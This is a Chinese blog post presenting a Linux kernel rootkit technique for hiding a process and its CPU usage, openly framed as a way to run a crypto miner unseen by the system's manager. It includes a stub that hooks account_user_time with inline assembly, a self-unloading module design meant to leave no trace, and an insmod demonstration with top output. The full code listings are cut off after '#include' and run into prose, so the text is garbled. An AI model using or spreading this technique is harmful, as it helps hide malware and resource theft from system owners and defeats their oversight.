Linux系统中彻底隐藏你的进程(rootkit挖矿利器哦)
最近写了一篇隐藏Linux进程的文章:
https://blog.csdn.net/dog250/article/details/105270500
上文和本文的声明: 有ROOT权限!有ROOT权限!有ROOT权限!
也许你会说,有ROOT还有啥干不了的啊!
哈哈,大部分人有ROOT依然也啥也干不了。至少,本文能让你学点手艺也不错。
感觉这个还是比较好玩的,简单直接磊落,没有那么多花活儿,寥寥几行代码,干干净净,同样在ROOT权限下,这个方案绝对是任何用户态PRELOAD库,hook procfs等方案的降维打击!这些库方案都太复杂了,没有编程功底搞不定的,像我这种不怎么会编程的,肯定玩不转。
但上文中的内核方案依然还是比较朴素,还是容易被经理抓到。
虽然ps看不到隐藏的进程,但是top中的CPU汇总还是有的啊。比如说,我隐藏了执行死循环的loop进程,但是top是这样子的:
Tasks: 122 total, 1 running, 121 sleeping, 0 stopped, 0 zombie
%Cpu0 : 0.0 us, 0.3 sy, 0.0 ni, 99.7 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu1 :100.0 us, 0.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu2 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu3 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 1016488 total, 702116 free, 99332 used, 215040 buff/cache
KiB Swap: 2097148 total, 2097148 free, 0 used. 770848 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1363 root 20 0 0 0 0 S 0.3 0.0 0:00.07 kworker/0:3
1 root 20 0 125360 3800 2496 S 0.0 0.4 0:00.79 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
3 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
虽然看不到loop进程,但是CPU1的100.0 us还是真真切切的,经理肯定会注意到的…
所以说,需要hook住account_user_time这个函数,stub函数中加入下面的逻辑:
static unsigned int pid = 0;
module_param(pid, int, 0444);
void stub_func(struct task_struct *p, u64 cputime, u64 cputime_scaled)
{
if (p->pid == pid) {
// 如果pid是我们要隐藏的,skip掉account_user_time的堆栈。
// 直接返回account_user_time的调用者。
asm ("pop %rbp; pop %r11; retq;");
}
// 如果pid不是我们要隐藏的,就直接返回原始的account_user_time函数。
}
此外,还有一个问题,我们实现进程隐藏的内核模块必须是oneshot的,必须干完就走。它不能一直驻留在系统中,否则经理肯定会查到有一个奇怪的内核模块。
也就是说,模块的init函数必须返回非0!这意味着模块的内核也会被释放,所以我们的stub函数需要额外的申请内存,且该内存还必须在account_user_time函数可以32位相对跳转的范围内。
嗯,嗯,嗯,貌似可以了,模块的init函数把事情做完后,事了拂衣去,不留身与名,空留一个stub_func来过滤account_user_time,不错,不错!
但是,且慢!
pid是个模块参数,当模块由于init函数返回非0而加载失败后,其实它的内存将会全部释放,包括pid参数,也就是说,stub_func中无法访问pid参数变量!因此,stub_func中的cmp指令比较必须采用立即数的方式,也就是说,我们需要通过模块的pid参数来校准这个stub_func中的cmp操作数。
好了,上代码了:
// hide_process.c
#include 来吧!看个效果。
首先我们准备一个恶意的且消耗CPU的程序:
#include 运行它,看top:
%Cpu0 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu1 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu2 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu3 :100.0 us, 0.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 1016488 total, 727332 free, 96040 used, 193116 buff/cache
KiB Swap: 2097148 total, 2097148 free, 0 used. 775868 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1494 root 20 0 4212 356 280 R 100.0 0.0 0:10.15 loop
63 root 20 0 0 0 0 S 0.3 0.0 0:00.16 kworker/0:2
我们看到,loop进程的pid是1494,我们以它为参数,加载模块:
[root@localhost test]# insmod ../hide_process.ko pid=1494
再看top:
%Cpu0 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu1 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu2 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu3 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 1016488 total, 726620 free, 96772 used, 193096 buff/cache
KiB Swap: 2097148 total, 2097148 free, 0 used. 775148 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1 root 20 0 190956 3836 2496 S 0.0 0.4 0:00.79 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
3 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
干干净净的!经理会兴叹。
好了,效果已经演示过了,来说说这个程序的问题。
首先,由于stub函数hook后只是一个pid判断,所以它的效果就是只能隐藏一个进程的CPU利用情况。如果使用一个链表的话,就比较完美,然而用汇编操作链表会引入很长的篇幅,没有意思,会让人失去兴致。
此外,我这里仅仅是hook了account_user_time这么一个函数,其实在时钟tick的处理中,要想彻底隐藏某个进程不让其时间被记账,还需要hook别的几个函数,但同样,这会引入篇幅,不利于展示手艺。所以,这里同样不再赘述这方面的完整解。
再次,本文中我这个例子是事了拂衣去的效果,它的本意就是前脚跨出大门,后脚就不准备再跨进大门的,所以没有打印被隐藏进程的地址信息,因此也就很难将其恢复了。这里的考虑依然是怕经理发现,试问,被隐藏的进程地址信息打印到哪里呢?只要打印出来,就有可能被经理抓到把柄。
经理抓到的话,就会坠入唯心主义的深渊!我们不能犯形而上学的错误。
最后,由于我们hook了时间统计函数,有经验的人肯定会想到check这个函数有没有被hook,这么一下子顺藤摸瓜,直接就露馅了…所以说,本质的做法还是要在被隐藏进程的自身来做。比如寻找一个定时机制,偷偷插入不断递减被隐藏进程CPU使用计数器的逻辑。
嗯,在中间hook一个不熟知的函数,比在开头hook一个熟知的函数,要安全很多。
附:可以同时实现隐进程隐藏,user CPU隐藏,system CPU隐藏的Linux Rootkit(需要根据Linux内核具体版本微调)
我做的这些其实就是一个rootkit,我这个rootkit和之前网上能找到的不同。事实上,我一开始并不知道我做的这个是一个rootkit,但从最终效果上看,它就是。
一般而言,所谓的rootkit都会做下面几件事:
- hook住proc的文件系统操作。
- 把内核模块隐藏掉。
- …
但我这个不是如此的实现。我这个采用了完全不同的方法:
- 直接把task从内核管理结构中摘除。
- hook掉被隐藏进程的时间计数。
- oneshot执行上述动作,不留内核模块。
而且我这个最大的特点就是 超级简单!!
另外,我这种方法中,既然已经做到了包括CPU利用率的100%隐藏,你也就不必把server逻辑放在内核里面了,放在用户态即可,反正经理啥也看不到!哈哈哈!
如果你真的还是要在内核中放一个server,那就搞一个内核线程呗,隐藏的方法完全一样!
// hide_process.c
#include 浙江温州皮鞋湿,下雨进水不会胖。